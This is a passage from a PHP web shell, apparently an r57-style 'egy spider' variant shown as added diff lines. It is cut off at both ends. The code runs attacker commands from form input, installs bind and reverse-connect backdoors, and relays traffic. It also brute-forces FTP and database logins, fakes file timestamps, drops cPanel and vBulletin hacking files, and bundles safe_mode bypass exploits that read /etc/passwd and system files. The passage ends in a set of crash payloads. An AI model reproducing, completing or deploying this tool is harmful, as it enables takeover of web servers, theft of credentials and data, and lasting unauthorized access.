-name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\''; +} +if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_") + { + switch($_POST['what']) + { + case 'own': + @chown($_POST['param1'],$_POST['param2']); + break; + case 'grp': + @chgrp($_POST['param1'],$_POST['param2']); + break; + case 'mod': + @chmod($_POST['param1'],intval($_POST['param2'], 8)); + break; + } + $_POST['cmd']=""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="mk") + { + switch($_POST['what']) + { + case 'file': + if($_POST['action'] == "create") + { + if(@file_exists($_POST['mk_name']) || !morewrite($_POST['mk_name'],'your text here')) { err(2,$_POST['mk_name']); $_POST['cmd']=""; } + else { + $_POST['e_name'] = $_POST['mk_name']; + $_POST['cmd']="edit_file"; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>"; + } + } + else if($_POST['action'] == "delete") + { + if(@unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + case 'dir': + if($_POST['action'] == "create"){ + if(@mkdir($_POST['mk_name'])) + { + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>"; + } + else { err(2,$_POST['mk_name']); $_POST['cmd']=""; } + } + else if($_POST['action'] == "delete"){ + if(@rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + } + } + + + + 
+if(!empty($_POST['cmd']) && $_POST['cmd']=="touch") +{ +if(!$_POST['file_name_r']) + { + $datar = $_POST['day']." ".$_POST['month']." ".$_POST['year']." ".$_POST['chasi']." hours ".$_POST['minutes']." minutes ".$_POST['second']." seconds"; + $datar = @strtotime($datar); + @touch($_POST['file_name'],$datar,$datar);} +else{ + @touch($_POST['file_name'],@filemtime($_POST['file_name_r']),@filemtime($_POST['file_name_r'])); +} +$_POST['cmd']=""; +} + + + + +if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name'])) + { + if(@is_dir($_POST['e_name'])){ err(1,$_POST['e_name']); $_POST['cmd']=""; } + elseif($file=moreread($_POST['e_name'])) { $filedump = $file; if(!@is_writable($_POST['e_name'])) { $only_read = 1; }; } + elseif($file=readzlib($_POST['e_name'])) { $filedump = $file; $only_read = 1; } + elseif(@file_exists($_POST['e_name'])) {$filedump = 'NONE'; if(!@is_writable($_POST['e_name'])) { $only_read = 1; };} + else { err(1,$_POST['e_name']); $_POST['cmd']=""; } + if(!empty($_POST['cmd'])) + { + echo $table_up3; + echo $font; + echo "<form name=save_file method=post>"; + echo ws(3)."<b>".$_POST['e_name']."</b>"; + echo "<div align=center><textarea name=e_text cols=121 rows=24>"; + echo @htmlspecialchars($filedump); + echo "</textarea>"; + echo "<input type=hidden name=e_name value='".$_POST['e_name']."'>"; + echo "<input type=hidden name=dir value='".$dir."'>"; + echo "<input type=hidden name=cmd value=save_file>"; + echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." 
\">")); + echo "</div>"; + echo "</font>"; + echo "</form>"; + echo "</td></tr></table>"; + exit(); + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file") + { + $mtime = @filemtime($_POST['e_name']); + if(!@is_writable($_POST['e_name'])) { err(0,$_POST['e_name']); } + else { + if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']); + morewrite($_POST['e_name'],$_POST['e_text']); + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>"; + } + @touch($_POST['e_name'],$mtime,$mtime); + } + + + +if (!empty($_POST['proxy_port'])&&($_POST['use']=="Perl")) +{ + cf($tempdir.'prxpl',$prx_pl); + $p2=which("perl"); + $blah = ex($p2.' '.$tempdir.'prxpl '.$_POST['proxy_port'].' &'); + @unlink($tempdir.'prxpl'); + $_POST['cmd']="ps -aux | grep prxpl"; +} +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")) +{ + cf($tempdir.'bd.c',$port_bind_bd_c); + $blah = ex('gcc -o '.$tempdir.'bd '.$tempdir.'bd.c'); + @unlink($tempdir.'bd.c'); + $blah = ex($tempdir.'bd '.$_POST['port'].' '.$_POST['bind_pass'].' &'); + @unlink($tempdir.'bd'); + $_POST['cmd']="ps -aux | grep bd"; +} +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")) +{ + cf($tempdir.'bdpl',$port_bind_bd_pl); + $p2=which("perl"); + $blah = ex($p2.' '.$tempdir.'bdpl '.$_POST['port'].' &'); + @unlink($tempdir.'bdpl'); + $_POST['cmd']="ps -aux | grep bdpl"; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl")) +{ + cf($tempdir.'back',$back_connect); + $p2=which("perl"); + $blah = ex($p2.' '.$tempdir.'back '.$_POST['ip'].' '.$_POST['port'].' &'); + @unlink($tempdir.'back'); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." 
...\""; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C")) +{ + cf($tempdir.'back.c',$back_connect_c); + $blah = ex('gcc -o '.$tempdir.'backc '.$tempdir.'back.c'); + @unlink($tempdir.'back.c'); + $blah = ex($tempdir.'backc '.$_POST['ip'].' '.$_POST['port'].' &'); + @unlink($tempdir.'back'); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl")) +{ + cf($tempdir.'dp',$datapipe_pl); + $p2=which("perl"); + $blah = ex($p2.' '.$tempdir.'dp '.$_POST['local_port'].' '.$_POST['remote_host'].' '.$_POST['remote_port'].' &'); + @unlink($tempdir.'dp'); + $_POST['cmd']="ps -aux | grep dp"; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C")) +{ + cf($tempdir.'dpc.c',$datapipe_c); + $blah = ex('gcc -o '.$tempdir.'dpc '.$tempdir.'dpc.c'); + @unlink($tempdir.'dpc.c'); + $blah = ex($tempdir.'dpc '.$_POST['local_port'].' '.$_POST['remote_port'].' '.$_POST['remote_host'].' &'); + @unlink($tempdir.'dpc'); + $_POST['cmd']="ps -aux | grep dpc"; +} + + +if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; } + + +for($upl=0;$upl<=16;$upl++) +{ + if(!empty($HTTP_POST_FILES['userfile'.$upl]['name'])){ + if(!empty($_POST['new_name']) && ($upl==0)) { $nfn = $_POST['new_name']; } + else { $nfn = $HTTP_POST_FILES['userfile'.$upl]['name']; } + @move_uploaded_file($HTTP_POST_FILES['userfile'.$upl]['tmp_name'],$_POST['dir']."/".$nfn) + or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile'.$upl]['name']."</div></font>"); + } +} +if (!empty($_POST['port1'])) +{ + cf("bds",$port_bind_bd_cs); + $blah = ex("chmod 777 bds"); + $blah = ex("./bds ".$_POST['port1']." 
&"); + $_POST['cmd']="echo \"Now script install backdoor connect to port "; + }else{ +cf("/tmp/bds",$port_bind_bd_cs); + $blah = ex("chmod 777 bds"); + } +if (!empty($_POST['php_ini1'])) +{ + cf("php.ini",$egy_ini); + $_POST['cmd']=" now make incloude for file ini.php and add ss and your shell"; + } + + + if (!empty($_POST['htacces'])) +{ + cf(".htaccess",$htacces); + $_POST['cmd']="now .htaccess has been add"; + } + if (!empty($_POST['egy_res'])) +{ + cf(".ini.php",$egy_res); + $_POST['cmd']="now .htaccess has been add"; + } + if (!empty($_POST['egy_ini'])) +{ + cf("ini.php",$egy_ini); + + + + $_POST['cmd']=" http://target.com/ini.php?egy=http://shell.txt? add ss ini.php now make incloude for file ini.php and add egy and your shell"; + } + + + if (!empty($_POST['egy_cp'])) +{ + cf("pass_cpanel.php",$egy_cp); + $_POST['cmd']="cpanel add"; + } + + + if (!empty($_POST['egy_vb'])) +{ + cf("vb_hacker.php",$egy_vb); + $_POST['cmd']="Added Following Files .htaccess & ini.php & vb_hacker.php & pass_cpanel.php "; + } + +if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; } + + +for($upl=0;$upl<=16;$upl++) +{ + + +} + + +if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file'])) +{ + switch($_POST['with']) + { + case 'fopen': + $datafile = @implode("", @file($_POST['rem_file'])); + if($datafile) + { + if(!morewrite($_POST['loc_file'],$datafile)){ err(0);}; + } + + + $_POST['cmd'] = ''; + break; + case 'wget': + $_POST['cmd'] = which('wget')." \"".$_POST['rem_file']."\" -O \"".$_POST['loc_file']."\""; + break; + case 'fetch': + $_POST['cmd'] = which('fetch')." -p \"".$_POST['rem_file']."\" -o \"".$_POST['loc_file']."\""; + break; + case 'lynx': + $_POST['cmd'] = which('lynx')." -source \"".$_POST['rem_file']."\" > \"".$_POST['loc_file']."\""; + break; + case 'links': + $_POST['cmd'] = which('links')." 
-source \"".$_POST['rem_file']."\" > \"".$_POST['loc_file']."\""; + break; + case 'GET': + $_POST['cmd'] = which('GET')." \"".$_POST['rem_file']."\" > \"".$_POST['loc_file']."\""; + break; + case 'curl': + $_POST['cmd'] = which('curl')." \"".$_POST['rem_file']."\" -o \"".$_POST['loc_file']."\""; + break; + } +} +if(!empty($_POST['cmd']) && (($_POST['cmd']=="ftp_file_up") || ($_POST['cmd']=="ftp_file_down"))) + { + list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); + if(empty($ftp_port)) { $ftp_port = 21; } + $connection = @ftp_connect ($ftp_server,$ftp_port,10); + if(!$connection) { err(3); } + else + { + if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); } + else + { + if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);} + if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);} + } + } + @ftp_close($connection); + $_POST['cmd'] = ""; + } + + +if(!empty($_POST['cmd']) && (($_POST['cmd']=="ftp_brute") || ($_POST['cmd']=="db_brute"))) + { + if($_POST['cmd']=="ftp_brute"){ + list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']); + if(empty($ftp_port)) { $ftp_port = 21; } + $connection = @ftp_connect ($ftp_server,$ftp_port,10); + }else if($_POST['cmd']=="db_brute"){ + $connection = 1; + } + if(!$connection) { err(3); $_POST['cmd'] = ""; } + else if(($_POST['brute_method']=='passwd') && (!$users=get_users('/etc/passwd'))){ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; } + else if(($_POST['brute_method']=='dic') && (!$users=get_users($_POST['dictionary']))){ echo "<table width=100% 
cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>Can\'t get password list</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; } + if($_POST['cmd']=="ftp_brute"){@ftp_close($connection);} + } + + +echo $table_up3; +if (empty($_POST['cmd']) && !$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); } +else if(empty($_POST['cmd']) && $safe_mode){ $_POST['cmd']="safe_dir"; } +echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>"; +{ + switch($_POST['cmd']) + { + case 'safe_dir': + + if (@function_exists('scandir') && ($d=@scandir($dir)) && !isset($_POST['glob']) && !isset($_POST['realpath'])) + { + foreach ($d as $file) + { + if ($file=="." || $file=="..") continue; + @clearstatcache(); + @list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); + if(!$unix){ + echo date("d.m.Y H:i",$mtime); + if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size); + } + else{ + if(@function_exists('posix_getpwuid') && @function_exists('posix_getgrgid')){ + $owner = @posix_getpwuid($uid); + $grgid = @posix_getgrgid($gid); + }else{$owner['name']=$grgid['name']='';} + echo $inode." "; + echo perms(@fileperms($file)); + @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); + echo @date("d.m.Y H:i ",$mtime); + } + echo "$file\n"; + } + } + + + elseif (@function_exists('dir') && ($d=@dir($dir)) && !isset($_POST['glob']) && !isset($_POST['realpath'])) + { + while (false!==($file=$d->read())) + { + if ($file=="." 
|| $file=="..") continue; + @clearstatcache(); + @list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); + if(!$unix){ + echo date("d.m.Y H:i",$mtime); + if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size); + } + else{ + if(@function_exists('posix_getpwuid') && @function_exists('posix_getgrgid')){ + $owner = @posix_getpwuid($uid); + $grgid = @posix_getgrgid($gid); + }else{$owner['name']=$grgid['name']='';} + echo $inode." "; + echo perms(@fileperms($file)); + @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); + echo @date("d.m.Y H:i ",$mtime); + } + echo "$file\n"; + } + $d->close(); + } + + elseif (@function_exists('opendir') && @function_exists('readdir') && ($d=@opendir($dir)) && !isset($_POST['glob']) && !isset($_POST['realpath'])) + { + while (false!==($file=@readdir($d))) + { + if ($file=="." || $file=="..") continue; + @clearstatcache(); + @list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); + if(!$unix){ + echo date("d.m.Y H:i",$mtime); + if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size); + } + else{ + if(@function_exists('posix_getpwuid') && @function_exists('posix_getgrgid')){ + $owner = @posix_getpwuid($uid); + $grgid = @posix_getgrgid($gid); + }else{$owner['name']=$grgid['name']='';} + echo $inode." 
"; + echo perms(@fileperms($file)); + @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); + echo @date("d.m.Y H:i ",$mtime); + } + echo "$file\n"; + } + @closedir($d); + } + + + elseif(@function_exists('glob') && (isset($_POST['glob']) || !isset($_POST['realpath']))) + { + echo "PHP glob() listing directory Safe_mode bypass Exploit\r\n\r\n"; + function eh($errno, $errstr, $errfile, $errline) + { + global $D, $c, $i; + preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o); + if($o){ $D[$c] = $o[2]; $c++;} + } + $error_reporting = @ini_get('error_reporting'); + error_reporting(E_WARNING); + @ini_set("display_errors", 1); + @ini_alter("display_errors", 1); + $root = "/"; + if($dir) $root = $dir; + $c = 0; $D = array(); + @set_error_handler("eh"); + $chars = "_-.0123456789abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; + for($i=0; $i < strlen($chars); $i++) + { + $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}"; + $prevD = $D[count($D)-1]; + @glob($path."*"); + if($D[count($D)-1] != $prevD) + { + for($j=0; $j < strlen($chars); $j++) + { + $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}"; + $prevD2 = $D[count($D)-1]; + @glob($path."*"); + if($D[count($D)-1] != $prevD2) + { + for($p=0; $p < strlen($chars); $p++) + { + $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}"; + $prevD3 = $D[count($D)-1]; + @glob($path."*"); + if($D[count($D)-1] != $prevD3) + { + for($r=0; $r < strlen($chars); $r++) + { + $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}"; + @glob($path."*"); + } + } + } + } + } + } + } + $D = array_unique($D); + foreach($D as $item) echo "{$item}\r\n"; + echo "\r\n Generation time: ".round(@getmicrotime()-starttime,4)." 
sec\r\n"; + error_reporting($error_reporting); + } + elseif(@function_exists('realpath') && (!isset($_POST['glob']) || isset($_POST['realpath']))) + { + echo "PHP realpath() listing directory Safe_mode bypass Exploit\r\n\r\n"; + if(!$dir){$dir='/etc/';}; + if(!empty($_POST['end_rlph'])){$end_rlph=$_POST['end_rlph'];}else{$end_rlph='';} + if(!empty($_POST['n_rlph'])){$n_rlph=$_POST['n_rlph'];}else{$n_rlph='3';} + + + if($realpath=realpath($dir.'/')){echo $realpath."\r\n";} + if($end_rlph!='' && $realpath=realpath($dir.'/'.$end_rlph)){echo $realpath."\r\n";} + foreach($presets_rlph as $preset_rlph){ + if($realpath=realpath($dir.'/'.$preset_rlph.$end_rlph)){echo $realpath."\r\n";} + } + for($i=0; $i < strlen($chars_rlph); $i++){ + if($realpath=realpath($dir."/{$chars_rlph[$i]}".$end_rlph)){echo $realpath."\r\n";} + if($n_rlph<=1){continue;}; + for($j=0; $j < strlen($chars_rlph); $j++){ + if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}".$end_rlph)){echo $realpath."\r\n";} + if($n_rlph<=2){continue;}; + for($x=0; $x < strlen($chars_rlph); $x++){ + if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}".$end_rlph)){echo $realpath."\r\n";} + if($n_rlph<=3){continue;}; + for($y=0; $y < strlen($chars_rlph); $y++){ + if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}".$end_rlph)){echo $realpath."\r\n";} + if($n_rlph<=4){continue;}; + for($z=0; $z < strlen($chars_rlph); $z++){ + if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}{$chars_rlph[$z]}".$end_rlph)){echo $realpath."\r\n";} + if($n_rlph<=5){continue;}; + for($w=0; $w < strlen($chars_rlph); $w++){ + if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}{$chars_rlph[$z]}{$chars_rlph[$w]}".$end_rlph)){echo $realpath."\r\n";} + } + } + } + } + } + } + echo "\r\n Generation time: ".round(@getmicrotime()-starttime,4)." 
sec\r\n"; + } + else echo $lang[$language.'_text29']; + break; + + case 'test1': + $ci = @curl_init("file://".$_POST['test1_file']); + $cf = @curl_exec($ci); + echo htmlspecialchars($cf); + break; + case 'test2': + @include($_POST['test2_file']); + break; + case 'test3': + if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; } + $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']); + if($db) + { + if(@mysql_select_db($_POST['test3_md'],$db)) + { + @mysql_query("DROP TABLE IF EXISTS temp_r57_table"); + @mysql_query("CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL )"); +/* @mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");*/ + @mysql_query("LOAD DATA LOCAL INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table"); + $r = @mysql_query("SELECT * FROM temp_r57_table"); + while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0])."\r\n"; } + @mysql_query("DROP TABLE IF EXISTS temp_r57_table"); + } + else echo "[-] ERROR! Can't select database"; + @mysql_close($db); + } + else echo "[-] ERROR! Can't connect to mysql server"; + break; + case 'test4': + if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; } + $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']); + if($db) + { + if(@mssql_select_db($_POST['test4_md'],$db)) + { + @mssql_query("drop table r57_temp_table",$db); + @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db); + @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db); + $res = mssql_query("select * from r57_temp_table",$db); + while(($row=@mssql_fetch_row($res))) + { + echo htmlspecialchars($row[0])."\r\n"; + } + @mssql_query("drop table r57_temp_table",$db); + } + else echo "[-] ERROR! Can't select database"; + @mssql_close($db); + } + else echo "[-] ERROR! 
Can't connect to MSSQL server"; + break; + case 'test5': + $temp=tempnam($dir, "fname"); + if (@file_exists($temp)) @unlink($temp); + $extra = "-C ".$_POST['test5_file']." -X $temp"; + @mb_send_mail(NULL, NULL, NULL, NULL, $extra); + $str = moreread($temp); + echo htmlspecialchars($str); + @unlink($temp); + break; + case 'test6': + $stream = @imap_open('/etc/passwd', "", ""); + $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*"); + for ($i = 0; $i < count($dir_list); $i++) echo htmlspecialchars($dir_list[$i])."\r\n"; + @imap_close($stream); + break; + case 'test7': + $stream = @imap_open($_POST['test7_file'], "", ""); + $str = @imap_body($stream, 1); + echo htmlspecialchars($str); + @imap_close($stream); + break; + case 'test8': + $temp=@tempnam($_POST['test8_file2'], "copytemp"); + $str = readzlib($_POST['test8_file1'],$temp); + echo htmlspecialchars($str); + @unlink($temp); + break; + + case 'test9': + @ini_restore("safe_mode"); + @ini_restore("open_basedir"); + $str = moreread($_POST['test9_file']); + echo htmlspecialchars($str); + break; + case 'test10': + @ob_clean(); + $error_reporting = @ini_get('error_reporting'); + error_reporting(E_ALL ^ E_NOTICE); + @ini_set("display_errors", 1); + @ini_alter("display_errors", 1); + $str=@fopen($_POST['test10_file'],"r"); + while(!feof($str)){print htmlspecialchars(fgets($str));} + fclose($str); + error_reporting($error_reporting); + break; + case 'test11': + @ob_clean(); + $temp = 'zip://'.$_POST['test11_file']; + $str = moreread($temp); + echo htmlspecialchars($str); + break; + case 'test12': + @ob_clean(); + $temp = 'compress.bzip2://'.$_POST['test12_file']; + $str = moreread($temp); + echo htmlspecialchars($str); + break; + case 'test13': + @error_log($_POST['test13_file1'], 3, "php://../../../../../../../../../../../".$_POST['test13_file2']); + echo $lang[$language.'_text61']; + break; + case 'test14': + @session_save_path($_POST['test14_file2']."\0;$tempdir"); + @session_start(); + 
@$_SESSION[php]=$_POST['test14_file1']; + echo $lang[$language.'_text61']; + break; + case 'test15': + @readfile($_POST['test15_file1'], 3, "php://../../../../../../../../../../../".$_POST['test15_file2']); + echo $lang[$language.'_text61']; + + break; + case 'test_5_2_6': +echo getcwd()."\n"; +chdir($_POST['test_5_2_6']); +echo getcwd()."\n"; + break; + + + case 'test2_5_2_6': +var_dump(posix_access($_POST['test15_file1'])); + + + break; + + case 'test_5_2_4': +//PHP 5.2.4 ionCube extension safe_mode and disable_functions protections bypass + + +//author: shinnai +//mail: shinnai[at]autistici[dot]org +//site: http://shinnai.altervista.org + + +//Tested on xp Pro sp2 full patched, worked both from the cli and on apache + + +//Technical details: +//ionCube version: 6.5 +//extension: ioncube_loader_win_5.2.dll (other may also be vulnerable) +//url: www.egyspider.eu + + +//php.ini settings: +//safe_mode = On +//disable_functions = ioncube_read_file, readfile + + +//Description: +//This is useful to obtain juicy informations but also to retrieve source +//code of php pages, password files, etc... you just need to change file path. +//Anyway, don't worry, nobody will read your obfuscated code :) + + +//greetz to: BlackLight for help me to understand better PHP + + +//P.S. +//This extension contains even an interesting ioncube_write_file function... + + +if (!extension_loaded("ionCube Loader")) die("ionCube Loader extension required! 
You are now can establish any order"); + + +$path = str_repeat("..\\", 20); + + +$MyBoot_readfile = readfile($path."windows\\system.ini"); #just to be sure that I set correctely disable_function :) + + +$MyBoot_ioncube = ioncube_read_file($path."boot.ini"); + + +echo $MyBoot_readfile; + + +echo "<br><br>ionCube output:<br><br>"; + + +echo $MyBoot_ioncube; + break; + + + + case 'egy_perl': +if(!extension_loaded('perl'))die('perl extension is not loaded'); +if(!isset($_GET))$_GET=&$HTTP_GET_VARS; +if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls'; +$perl=new perl(); +echo "<textarea rows='25' cols='75'>"; +$perl->eval("system('".$_GET['cmd']."')"); +echo "</textarea>"; +$_GET['cmd']=htmlspecialchars($_GET['cmd']); + break; + + break; + case 'egy_4_2_0': + for ($i = 0; $i < 60000; $i++) + { + if (($tab = @posix_getpwuid($i)) != NULL) + { + echo $tab['name'].":"; + echo $tab['passwd'].":"; + echo $tab['uid'].":"; + echo $tab['gid'].":"; + echo $tab['gecos'].":"; + echo $tab['dir'].":"; + echo $tab['shell']."<br>"; + } + } + break; + + + + + case 'egy_5_2_3': +//PHP 5.2.3 win32std extension safe_mode and disable_functions protections bypass + + +//author: egy spider +//mail: egy_spider@hotmail.com +//site: http://egyspider.eu + + +//Tested on xp Pro sp2 full patched, worked both from the cli and on apache + + +//Thanks to rgod for all his precious advises :) + + +//I set php.ini in this way: +//safe_mode = On +//disable_functions = system +//if you launch the exploit from the cli, cmd.exe will be wxecuted +//if you browse it through apache, you'll see a new cmd.exe process activated in taskmanager + + +if (!extension_loaded("win32std")) die("win32std extension required!"); +system("cmd.exe"); //just to be sure that protections work well +win_shell_execute("..\\..\\..\\..\\windows\\system32\\cmd.exe"); + break; + + + break; + + + case 'test16': + if (@fopen('srpath://../../../../../../../../../../../'.$_POST['test16_file'],"a")) echo 
$lang[$language.'_text61']; + break; + case 'test17_1': + @unlink('symlinkread'); + @symlink('a/a/a/a/a/a/', 'dummy'); + @symlink('dummy/../../../../../../../../../../../'.$_POST['test17_file'], 'symlinkread'); + @unlink('dummy'); + while (1) + { + @symlink('.', 'dummy'); + @unlink('dummy'); + } + break; + case 'test17_2': + $str=''; + while (strlen($str) < 3) { +/* $str = moreread('symlinkread');*/ + $str = @file_get_contents('symlinkread'); + if($str){ @ob_clean(); echo htmlspecialchars($str);} + } + break; + case 'test17_3': + $dir = $files = array(); + if(@version_compare(@phpversion(),"5.0.0")>=0){ + while (@count($dir) < 3) { + $dir=@scandir('symlinkread'); + if (@count($dir) > 2) {@ob_clean(); @print_r($dir); } + } + } + else { + while (@count($files) < 3) { + $dh = @opendir('symlinkread'); + while (false !== ($filename = @readdir($dh))) { + $files[] = $filename; + } + if(@count($files) > 2){@ob_clean(); @print_r($files); } + } + } + break; + case 'test18': + @putenv("TMPDIR=".$_POST['test18_file2']); + @ini_set("session.save_path", ""); + @ini_alter("session.save_path", ""); + @session_start(); + @$_SESSION[php]=$_POST['test18_file1']; + echo $lang[$language.'_text61']; + break; + case 'test19': + if(empty($_POST['test19_port'])) { $_POST['test19_port'] = "3306"; } + $m = new mysqli('localhost',$_POST['test19_ml'],$_POST['test19_mp'],$_POST['test19_md'],$_POST['test19_port']); + if(@mysqli_connect_errno()){ echo "[-] ERROR! 
Can't connect to mysqli server: ".mysqli_connect_error() ;}; + $m->options(MYSQLI_OPT_LOCAL_INFILE, 1); + $m->set_local_infile_handler("r"); + $m->query("DROP TABLE IF EXISTS temp_r57_table"); + $m->query("CREATE TABLE temp_r57_table ( 'file' LONGBLOB NOT NULL )"); + $m->query("LOAD DATA LOCAL INFILE \"".$_POST['test19_file']."\" INTO TABLE temp_r57_table"); + $r = $m->query("SELECT * FROM temp_r57_table"); + while(($r_sql = @mysqli_fetch_array($r))) { echo @htmlspecialchars($r_sql[0])."\r\n"; } + $m->query("DROP TABLE IF EXISTS temp_r57_table"); + $m->close(); + break; + } +} + + +if((!$safe_mode) && ($_POST['cmd']!="php_eval") && ($_POST['cmd']!="mysql_dump") && ($_POST['cmd']!="db_query") && ($_POST['cmd']!="ftp_brute") && ($_POST['cmd']!="db_brute")){ + $cmd_rep = ex($_POST['cmd']); + if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; } + else { echo @htmlspecialchars($cmd_rep)."\n"; } +}/*elseif($safe_mode){ + $cmd_rep = safe_ex($_POST['cmd']); + if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; } + else { echo @htmlspecialchars($cmd_rep)."\n"; } +} +*/ + + +switch($_POST['cmd']) +{ + case 'dos1': + function a() { a(); } a(); + break; + case 'dos2': + @pack("d4294967297", 2); + break; + case 'dos3': + $a = "a";@unserialize(@str_replace('1', 2147483647, @serialize($a))); + break; + case 'dos4': + $t = array(1);while (1) {$a[] = &$t;}; + break; + case 'dos5': + @dl("sqlite.so");$db = new SqliteDatabase("foo"); + break; + case 'dos6': + preg_match('/(.(?!b))*/', 